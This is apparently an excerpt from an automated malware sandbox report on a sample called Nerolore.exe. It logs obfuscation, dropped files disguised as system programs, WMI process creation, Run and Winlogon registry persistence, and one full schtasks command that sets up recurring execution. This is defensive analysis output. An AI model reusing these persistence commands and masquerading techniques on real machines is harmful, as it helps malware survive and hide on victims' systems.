                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\54f8e4f5b93f5aJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exeJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeDirectory created: C:\Program Files\7-Zip\Lang\54f8e4f5b93f5aJump to behavior
                              Source: Nerolore.exeStatic file information: File size 3514624 > 1048576
                              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093071531.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.pdb source: ContainerAgentWinSession.exe, 00000005.00000002.2279169937.0000000003642000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Detected unpacking (changes PE section rights)
                              Source: C:\Users\user\Desktop\Nerolore.exeUnpacked PE file: 0.2.Nerolore.exe.f00000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"Jump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeFile created: C:\FontHost\__tmp_rar_sfx_access_check_3889468Jump to behavior
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name:
                              Source: Nerolore.exeStatic PE information: section name: cheat
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100E104 push ecx; mov dword ptr [esp], edx0_2_0100E109
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0101219C push ecx; mov dword ptr [esp], edx0_2_0101219E
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100E32C push ecx; mov dword ptr [esp], edx0_2_0100E331
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FFA3EA push 00FFA418h; ret 0_2_00FFA410
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100228C push 010026D8h; ret 0_2_010026D0
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FFA4F8 push 00FFA52Ch; ret 0_2_00FFA524
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100A536 push 0100A5B5h; ret 0_2_0100A5AD
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0101054C push ecx; mov dword ptr [esp], edx0_2_0101054D
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FFA494 push 00FFA4C0h; ret 0_2_00FFA4B8
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FFA45C push 00FFA488h; ret 0_2_00FFA480
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FFA424 push 00FFA450h; ret 0_2_00FFA448
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0101840C push ecx; mov dword ptr [esp], edx0_2_01018411
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FF85F0 push 00FF8641h; ret 0_2_00FF8639
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100E448 push ecx; mov dword ptr [esp], edx0_2_0100E44D
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100C454 push 0100C4A1h; ret 0_2_0100C499
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100E48C push ecx; mov dword ptr [esp], edx0_2_0100E491
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FFA738 push 00FFA85Ch; ret 0_2_00FFA854
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_010026DA push 0100274Bh; ret 0_2_01002743
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FF88AA push 00FF88D8h; ret 0_2_00FF88D0
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100A804 push 0100A830h; ret 0_2_0100A828
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100285E push 0100288Ch; ret 0_2_01002884
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FF8968 push 00FF8994h; ret 0_2_00FF898C
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100CB08 push esp; retf 0_2_0100CB09
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100CB28 push esp; retf 0_2_0100CB29
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_01010F70 push ecx; mov dword ptr [esp], ecx0_2_01010F75
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_00FF4F90 push eax; ret 0_2_00FF4FCC
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100B3A0 push 0100B400h; ret 0_2_0100B3F8
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100B456 push 0100B5A4h; ret 0_2_0100B59C
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100974E push 0100979Ch; ret 0_2_01009794
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100962C push 010096A2h; ret 0_2_0100969A
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_0100B684 push ecx; mov dword ptr [esp], ecx0_2_0100B687
                              Source: Nerolore.exeStatic PE information: section name: entropy: 7.996595675539958
                              Source: Nerolore.exeStatic PE information: section name: entropy: 7.979931163938514
                              Source: Nerolore.exeStatic PE information: section name: entropy: 7.481225763284233
                              Source: Nerolore.exeStatic PE information: section name: entropy: 7.944529268421742
                              Source: Nerolore.exeStatic PE information: section name: entropy: 7.852938121836332
                              Source: Nerolore.exeStatic PE information: section name: cheat entropy: 7.987925279314385
                              Source: ContainerAgentWinSession.exe.0.drStatic PE information: section name: .text entropy: 7.5519356261605814
                              Source: NjWYKcLujkVoPzemFBeg.exe.5.drStatic PE information: section name: .text entropy: 7.5519356261605814
                              Source: OfficeClickToRun.exe.5.drStatic PE information: section name: .text entropy: 7.5519356261605814
                              Source: conhost.exe.5.drStatic PE information: section name: .text entropy: 7.5519356261605814
                              Source: NjWYKcLujkVoPzemFBeg.exe0.5.drStatic PE information: section name: .text entropy: 7.5519356261605814
                              Source: NjWYKcLujkVoPzemFBeg.exe1.5.drStatic PE information: section name: .text entropy: 7.5519356261605814

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\FontHost\ContainerAgentWinSession.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\LtUgLbtj.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\xvosSKAI.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\ProgramData\dbg\conhost.exeJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Nerolore.exeFile created: C:\FontHost\ContainerAgentWinSession.exeJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\vBGRGbPj.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\XwBnJZqg.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\goYNyXVt.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\EeOHqUfQ.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\GeIICmFp.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\EmyZUDGW.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\ddCMyFqs.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\ONhXawky.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\ProgramData\dbg\conhost.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\EmyZUDGW.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\XwBnJZqg.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\ONhXawky.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\EeOHqUfQ.logJump to dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile created: C:\Users\user\Desktop\vBGRGbPj.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\LtUgLbtj.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\GeIICmFp.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\xvosSKAI.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\goYNyXVt.logJump to dropped file
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile created: C:\Users\user\Desktop\ddCMyFqs.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an undocumented autostart registry key
                              Source: C:\FontHost\ContainerAgentWinSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSessionJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBegJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBegJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBegJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhostJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRunJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSessionJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSessionJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSessionJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ContainerAgentWinSessionJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBegJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBegJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBegJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NjWYKcLujkVoPzemFBegJump to behavior
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\ProgramData\dbg\conhost.exeProcess information set: NOOPENFILEERRORBOX
